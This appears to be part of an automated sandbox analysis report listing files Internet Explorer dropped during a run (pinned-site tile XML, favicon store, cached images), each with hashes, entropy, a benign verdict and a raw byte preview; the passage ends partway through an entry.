Preview:	......................>...........................................................D...E...F...G...............................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0..r..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.087980626813176
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc41EEad7dB/TD90/QL3WIZK0QhPPFVDHkEtMjwu:TMHdNMNxOEEa5LnWimI00ONVbkEtMb
MD5:	C0F0E696BD531C1501C17A572896704B
SHA1:	59FEA2CB8FBECFE55D03FDF3162F1438E3275D49
SHA-256:	9AC46141AA72BD128297500017A1EC5A7B2E8228F7E191A76148735E6ABE9EDD
SHA-512:	7F129AE4C9D6C38B619D6114AB34DA86C6476DB95340592628099D93A43E4A184570F1B468C162C203E8F078B0A154455C1301076E3B5470E327CAACC47FA863
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x88561c8b,0x01d7dff0</date><accdate>0x8b868e13,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.1080777675483695
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4fLGTkc7EobXUtTD90/QL3WIZK0QhPPFkI5kU5EtMjwu:TMHdNMNxe2kaEAUtnWimI00ONkak6Ety
MD5:	364B28B3C75B6371ED9A7DD4260FAE67
SHA1:	D071A45B3D0DAF7CF5B27C5E2490EBD279489B6D
SHA-256:	37AD92C131D5FDDE96349F14DA6820337D850106147FDAD64C6AF87C00D51D12
SHA-512:	9E92144223BEC553544E62352676E520EC76C9C7EE4C026FE1E4C15939E02A05B7DE0EE9E9A8D12A4FDE7CD0BB8B0FD2E98712463FF8EA359CFB27A86A65BBAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x7dc00d46,0x01d7dff0</date><accdate>0x7e622c30,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	360
Entropy (8bit):	5.107736549894857
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4GLeAC+s7VY3TD90/QL3WIZK0QhPPFyhBcEEtMjwu:TMHdNMNxvLpCF+3nWimI00ONmZEtMb
MD5:	B4C0790285C93FA5D5DF269910A4A56C
SHA1:	C017F46E08CA8DF5AD65D6D68C99406EFDE40981
SHA-256:	1F3CC4A673277C0DBDD8B3D098669E1A02E043CB221B08AF0A0FD295863F96C7
SHA-512:	0B71268043C2C9FEA922968DAE000833439E9D5B7AC4B82D38FAA4D4EF0816F4552C3489ADEE579AA8DA03DF44331853126FEAC7AF65DBBC915F763124F4A847
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x8bc22a28,0x01d7dff0</date><accdate>0x8be1275f,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.123837759095399
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4JIGW33VUBE+KTD90/QL3WIZK0QhPPFgE5EtMjwu:TMHdNMNxiIBH+E+KnWimI00ONd5EtMb
MD5:	AE0113131C820EBB6FD102DA2ED87FCD
SHA1:	DC4E51CFC295EE47F8153DD3D7F7D3A7D10A2BDA
SHA-256:	1235C4B2508343299CBA5A2915AAD0FD93E09A49E31AA2FB11BFCB8500A4C8C6
SHA-512:	D39B0F4112E0DB5083D2313F67F8519638750E87C586AE49857931AAFBA7BE5D2AC91A2DFD9BEABF51524302A87426C46994408C3A28382F2ADFE6BDAF581044
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x8456391f,0x01d7dff0</date><accdate>0x84ac0c82,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.111605618384957
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4UxGweLBAY3TD90/QL3WIZK0QhPPF8K0QU5EtMjwu:TMHdNMNxhGwgAY3nWimI00ON8K075Ety
MD5:	F78B5C40A51FE94816CBB21F5FB94787
SHA1:	CA9D366C70F0A1C35AF62483E42281B2FD99477A
SHA-256:	C16A1B76E0B0FACA1E9DDD2DA79FB0E61B8C9C34FA2F540A97D27911AE06DAEC
SHA-512:	FE049AF6FCB73E3A0C44A5F63B3F6C3506454539969E3268EC65D78A688E00DAC98BFAE17F3721AB47CAB592A086CEDB1D7CF25A6E06C12D460585F095A7FE46
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8bf8fed4,0x01d7dff0</date><accdate>0x8c159c3d,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.117285021147419
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4QunKMdqGXTD90/QL3WIZK0QhPPFAkEtMjwu:TMHdNMNx0nd3nWimI00ONxEtMb
MD5:	E4129AC6CD14BA5B7B0B557EB42EB32E
SHA1:	339CF5430D8E309B204C3A4D33978A4C978B4BC9
SHA-256:	3E90667EF2A7CEA0D637903B421F807F286D35159CE856D7F2E196B239025557
SHA-512:	B7EF2E27B29981CA97265FD10F5948F8442E4C808FD7603BA4C275ECE4457BB88C0A10B8E0E57E19CC3965618E1832A496FF06A1E68AA4E3A4BA35084C51F8CE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x86298479,0x01d7dff0</date><accdate>0x863efa71,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.147761772632051
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4oTfn/unTD90/QL3WIZK0QhPPF6Kq5EtMjwu:TMHdNMNxxfknWimI00ON6Kq5EtMb
MD5:	878FAD2B0A259C67E1BCCF419F487B8B
SHA1:	A35B4F055BB56A4692EE454B6360B502438EE748
SHA-256:	9BFB9FCE57F0825317FC385757999194E8F7B0B981C7EC8C2776391C1804CF46
SHA-512:	F1FF7DE0FEB206A6858FFEFDDB40CC68A75D12892CB814E0D38BB9E8DAA7DDFE9DC5658F1ABC22086433F2C14081B806913E48892591D26832A9B3D930889E28
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x8544a2d3,0x01d7dff0</date><accdate>0x860a860e,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.133498009122621
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4YX2nD1Ko8TD90/QL3WIZK0QhPPF02CqEtMjwu:TMHdNMNxcD1Ko8nWimI00ONVEtMb
MD5:	4D502DB193B2B165006E8C7E1277BCD0
SHA1:	7BA677F2F4E7EE9CF3241BD85614CBDDE8EA452A
SHA-256:	F05A5BBF42659E36717FB6C060931BBD9BFF3D749B4BBC8EC6ACCC2E450BAD11
SHA-512:	6A11225B4634F61A4CC8693D9E1D66568C82204A8D88EB0B345CA8902D6150D4DFCDB160AC489EBE3E7041980B68EBB74455DA50C92BCFB296A6E3304662F50D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81446d26,0x01d7dff0</date><accdate>0x835a7b73,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.089308135001532
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4Inn3TD90/QL3WIZK0QhPPFiwE5EtMjwu:TMHdNMNxfnn3nWimI00ONe5EtMb
MD5:	947A12ADBB64A9C7E012A033FEFBB6FA
SHA1:	ECE32A47C5919B84129EA839840533058B8B15C8
SHA-256:	A40C7DF308347D2C5124BE52DAC372B8712BC23803E76D49F5E070C1BA9F392F
SHA-512:	CE145D051221660D87FCEC3EE5B698352D7D75AE7B3803A772E3751F0B5D9DC2F586C34EB10EE948F8C07C718A17451164869C682EEB6EE32F4027FFD20564DB
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x83a82c20,0x01d7dff0</date><accdate>0x83bda234,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	22330
Entropy (8bit):	4.293002444235518
Encrypted:	false
SSDEEP:	96:eQQQQQ1n9KlyzS29dcBUXqupkE1OwDzXIzS29dcBUXq7E:3n4QzSAcBQpkEgcz4zSAcBa
MD5:	0894D09A4039772AF4591CAB1EC7708E
SHA1:	305F7A49F620B29DF2E4548B77A12F551D0EBBED
SHA-256:	B77E35D329FBEC8421BE32088E1008A79E219AE40D23B00CA20A0896666220DF
SHA-512:	241995A26E040B26A420682C10D3D469C34207983870A7B3B224FA74855CB8BB82C0A44B43321063000E5F9ABD86BC2AD9147AE2EE2F8B7683BE0F0BC8BFCE84
Malicious:	false
Preview:	........%.h.t.t.p.s.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.f.a.v.i.c.o.n...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\264bf325-c7e4-4939-8912-2424a7abe532[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	dropped
Size (bytes):	58885
Entropy (8bit):	7.966441610974613
Encrypted:	false
SSDEEP:	1536:Hj/aV3ggpq9UKGo7EVbG4+FVWC2eXNA6qQYKIp/uzL:Di3gyq9Ue7EVsCjeXuS
MD5:	FFA41B1A288BD24A7FC4F5C52C577099
SHA1:	E1FD1B79CCCD8631949357439834F331043CDD28
SHA-256:	AA29FA56717EA9922C3D85AB4324B6F58502C4CF649C850B1EC432E8E2DB955F
SHA-512:	64750B574FFA44C5FD0456D9A32DD1EF1074BA85D380FD996F2CA45FA2CE48D102961A34682B07BA3B4055690BB3622894F0E170BF2CC727FFCD19DECA7CCBBD
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................E.........................!...1."AQ.aq..#2.B.....$Rb...3...C...%&4.r..................................B.........................!1A.."Qa..2q.B.......#..Rr.$3b4....%CDc............?....]..l;.q.`.e...=..??n.\..).."..[K.W.u('$d$+.c...;.......R...(....N.~.J,g...-.....-H.[vI....n!.g......F... ...r..>%..b.l...".....~7.k..s..r....u...0...)........x........4.(Ik...EM.S...n4rN.V..88.J..~.....Q.FJ..A.D.-D.tk'?.F.......IY.]......O~=3.N....rr.u( .....'.h}.,.......3[[...q.....g...&.O.....z...k.n.:~.)-S(..M....:.?(?.2206..g..."..S........~.#.........=.....~.<,G.............B..\l6..@Jr=...(.....N.....xi.....}...o.:F@$...>.N8..~........6e&51.Rzd$....A.l.lw..b..._.....tb]\|`.t.....w........KLp...'.F.?......_.........b.a..6T...P...HIRv.F..1..A.M......2:...C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AA7XCQ3[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	667
Entropy (8bit):	7.561736401445472
Encrypted:	false
SSDEEP:	12:6v/7TUYRk5V6RwLzZvLk519s0/tWnssyQSKZLsLO7qcNrXlUA3YUz1oK9:STuzZc19skWssyQ5ZsO7qc1Vdf9
MD5:	C9E843CDDAD2F56F8F88B8D6A937B602
SHA1:	EE3382E8031321B266BA31CA47D0667F03C469F8
SHA-256:	D0A577DFBCF142D19E89E5ABC3EEC3020AD0C3A65B9BA6F6534097D0806B2100
SHA-512:	677CDE3738656508AEDBE2DA698B21B5AA15EBA8EDECE60192A5B61004E6CB6A1F718A02066AFF367021C31B9B13D2DDD703976E8F26C22272AE8AADBECC55ED
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+.....MIDATx...]HSa...n.l;.d..a-HK)..6......"..... ..Gn...E.Q&.EA.y.T....25.K..UT8...M.....>.[u.=.;.y_..../....#.z..w......6.....n!(.k{<....K..dv..Fm..Ro.NT..Y.N.....;.....$x.....d....p:.?^LR.8k.........7...9.........S<....)...B..#.5:uck...0..0 d..=V.T..ad.{[Z.?.026<..@...R..@.....}.p-..:......Qlo....5$.D............,..Q".x...c......+./`.f<....._F.&2q.8E........(...%T.}8...=.:...[[...@ ..e...6....Q...?..".q.......p.......j.f........4H\#j.i"@\|6_..2.i-.>.j.....)..'*]..r9.[.T5...$l.A.wa-<#.Dt]sPnc9F..Q.8...].....D...f._S...0WG.>b.....t.~j>.K.h]4~.....Q....BA..?.}.s..;.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAPFmi4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	846
Entropy (8bit):	7.686542726414513
Encrypted:	false
SSDEEP:	12:6v/7cM4j39Et8keaWbqx5608BcA5Anj/HwvwFxobkq4vIkOR3+XOq9zo7pZEz:1MAES35OxE0CAHDFxrEkU0tzo7p2z
MD5:	6F93C3616FBC7B9E97E87E718DF27B14
SHA1:	33F4B22E6C3DC6E9A2BDE8BECC3FC20D2F90A1B3
SHA-256:	DFCE8AE7B7C17FE90C55D7EE093936137DD0528FC4CC5BACDB5ED071FD2E312E
SHA-512:	99599A61F4D2FE8F28F32DDD62239E6FF86A68249A59D5B56AFF1F5D76B41FA841C20890C6BD943078CFBFC807CEDB1711499657866B7C259CC20C55D675D737
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...]LSg....=-x....!......'.H.).$c].xc.7F.,r.eK.x...hf.[.D..}...%.nj..D...H......@[(.~p.......n..=..o.....G......V..n>J..p.`,....g1m..ZjK@.VHV..Bst.B.1..z5$M.q..q..0.ug.5l.P. K..Cq.\|....k....]l..p..0..[1.4n......z..it..H.0.O...B...,!..[........`.k..d..'..~...7S.X(....&...,.&R..UU...L6s._8....D.=.. 2.7w...9....!...J...<.q....}r...\|.#...GB.....u....u.....b9l......%lb......LGQ..G."a....[..B...sYdM.!.A...7vv.J$x..U.H(9..d.....U\8....N...9....N..U\=9....2SmG......s,&.b.3........7...,..[.......Eb$.=w...x8M:..*z....b.2..8f#.-"....~-."......E.S.Q.....[(.D.........zB...z.^.H_.]U.9h......N^..4f0M.....%.An.xin....4.....7..^[...w'./......:.2nw....L...J.......N5W..5.q.......}..wT........,.R.N;4W:x..e.U...j. ...)/.dj#.d.._.je.x...@."_.@z.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAPQoxX[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	29573
Entropy (8bit):	7.923714752002336
Encrypted:	false
SSDEEP:	384:INas7fQoYk50HT2pCNRXne+4kfuASiPbTMJgn3ui/VveFKEZS1IdittMjFACj0A1:IzF10HapIdnear3kZSK4ttM8aaqeUHP
MD5:	64A63C14A787834D43C473733FBFFAD6
SHA1:	F364C8E81CFCA303F0A0F658BAF1276943669FCC
SHA-256:	C28A1E76B2CB256E0505676DDF289CDBBD0C9F2CE1553A021CF29D57626DFAD4
SHA-512:	204D9F37932441E64BF8E19AEE91EFFB8077C1CC4EF95A0F28B83254073EFFEF218DCCD4F032412257F3E9AE1764E41495CB96BFA620AF348E39AF54A3B47FED
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..e.[yv..W.t....%...i...TXlL..Ph-.F.Vm......v#...b..%....M.. .J...[.....q.iB.3.....i.D.........r....'&e.b....ztS..D....u.g(.Z...Y..5.).l.F...OZ...L.b..}..........)..#...9.t.)B...l.\'......J.......I..-,lA..NMjf.#....Y4.....7<..Wm'........R..f..tk,.AZ{K.......Ukjf.....J.a>e..a..t..!0G.i.`....s.h..HA@.v)...0....4^.!..[.}..yS].kX.>ddA..G".e..].Ww1J.l'..s.)."..~..]Y>...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAQVPm6[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2403
Entropy (8bit):	7.807847874907652
Encrypted:	false
SSDEEP:	48:QfAuETAzOifN8pL/nF/TFZoTy7zOWk0ljjGzRi3wWLtWOqO+zgtO:Qf7EwN8tndAW7zI0l0SRnqO+zgtO
MD5:	10BDCE1F28F778B6F7C76D396A88A0A3
SHA1:	705B774818562E65F4C0DC64A08D8D1E38932772
SHA-256:	EB966433ADA42DEA9BE343ECAFA32C13851D1ADAF91734E0697D96AE3B876D0A
SHA-512:	1BD59BED9431C26C14AA4545A6B459680BBDD855E20CE1FE2A5BD4B861DAA793CA9FA6EAF96F353099440E80DD2046E54577DD0B329C45B8EA5FE13CB08B67D0
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....O.GO.a.._+......f.wF....LBP.LB........i\[.e......(?3...t(.jd..3..bj.... uR..z-.7t?.6W..5$[Y..\.P.}*Z.............~..3.f...y.+)9hkN......=Z0N#..o.uTWFQvg~k..m.&h.."....i..n..#..M\..-]....K..r..y<7SM..[U..\|{......TeqN...h.S# ..fz..o.O....l\|......T.:Z@@..4..[....).EgQ7-..?.c.T.`..k..=2.....7...\.Y.-Q).2{kV.-....cM!66....Q...Rj.(.d..{...Z.#...Oj.KPI....t.1G?.....j....7Z..Z%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAQW0Fs[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2196
Entropy (8bit):	7.799560401503644
Encrypted:	false
SSDEEP:	48:QfAuETAQgh/boT8B8nC/6gVTzeIA8phYvzJrikCr9KJKqm5sLQ:Qf7E2h/MTRC/6mPCZCBKJjOMQ
MD5:	43B1E133700A65EF28BA0599062D2704
SHA1:	B853984965EE3ACB0924580E8A706AA971A8A5EC
SHA-256:	E90243483DCB75142ED2D6CA34804B2F005416AD471F456FC3DF88B2E69083C5
SHA-512:	A78E4743CAE5DA55EB88B19D59363AAF4DAB05E9A210C26D9FAB550276EB86B448F63385486D2A272FAF27F366ED9A78E41B175C69167020E89958645788D193
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..d`....2..F..i..M....H.Fr..,&.nL.\{.L.P..$M..2~.X..u..3.ml1.).b..^.....fU.-.P...".Q.?1.ERFnE.....;E..9%?...:h.K/.....5B"..........bu...O....+.RI.z5...G'.....1M..>.n]~.6.f.5G5._.....)`....h.g'"..G~"....6:..GNG["..w.flcM/,....+..I/b..T..Xr{z...dth..1.,[..U.c.....4.,...z...6$W.... ).y..c..f.n.Kj..K...}k.F....a.....Vu.)...6.....w....{#.1.....q..dw.4..$[T..d....tv..C).n.&

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAQXXJy[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	10174
Entropy (8bit):	7.937857195712491
Encrypted:	false
SSDEEP:	192:QovdgprHERH/bhOU+bPxwbgjL5J74qllIMFLl0ko1uXf6Y/ejuGJlPOcc:bqY/NOXxwbgj/4qllHl0kooXj/exJlWL
MD5:	49416265B664B6F3A009C607E64E0B83
SHA1:	07C95D7778CA943B6D2E2C7D8E99350F8EFD1DDE
SHA-256:	7C4A388541EE4DBD07BAC67CCDAA43D790797395EB715410C219BBA6C4D178D6
SHA-512:	C614EF9AD0AE944328249060A6A8C24EF4CDDB5C4967F06F5254CEA304E9EAE8DE0474BF7C4F4C22A3662F4A930ED6EA8069B589DFD20BDA4ECEF0D3B585BB3E
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lR(1@.>..s@.4.(.f....!s@.h.s@.h.......I.....i...d..{.9..Y,.-.I.......\|.....A..s..Qp.E0...LP.....(.......(......(........s@.4.~...xs..o..7...0=Me9_b.m.....RqY...#..a}.9..1s.{. ..zc..=...O....x...Z....&..Z.....-.....;UFd8.t........Z.G@.1......R....7..'...R..\|...LA@....P.@....P.@..j.v._j..s..;._A.....+..d.%T;.;.9...{Ks..o?..?SAV(....k..=cq....a..$l.e8.G.$.;\..........?.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAQXevg[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	12126
Entropy (8bit):	7.945197487897491
Encrypted:	false
SSDEEP:	192:QojRJN0D37cpItLy/vhNWN0jOv7QaeDPhM+xbBiKLZHx7bYfKdohw45mxNVv7M6n:bjRJNAjyJEvEj58KNR7whwMmxDMaYU
MD5:	549D7502E6B50302E7B7451DABF61781
SHA1:	87949284AB340C839F895F33BCD7ABE6ED992637
SHA-256:	904790AB667AD93D7F07BE7B90FD02EC0CF09F9194A78C0F52DBFC704FC49C7D
SHA-512:	E68451666915C21C9C8B254B1292D8702F7813D3496251998A7AC2EB5F0403E05A316221EC14F82E2A7A15CF2C58BC26CF94A942DC99B29498237F5291B1107B
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....`W......Y."O.2@zR...Jv.f}.`..u.P...z...k.F........}./.vS..ZKc..G@F..R2.\|.)...8......@.".......2.6r>...=2hn._..l%g..0..r.C...f=....`..{V.L.Q$7..F.......0t.n.n.Bm.<G../Jw.E(5'f!.q..P....2..hr$...D.r..N.c{ !r..2....#..i...4.yA.R.. O\P.@..@..7.+....1....C...l .A..bP...+jQ.>.......c..9...Fh..u../b....+..r'..D..x.(.l~\.LE...@.E......L"G.m<..Ke$A.....>..[.7.WI#..y=..C-...M

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAQXiy5[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
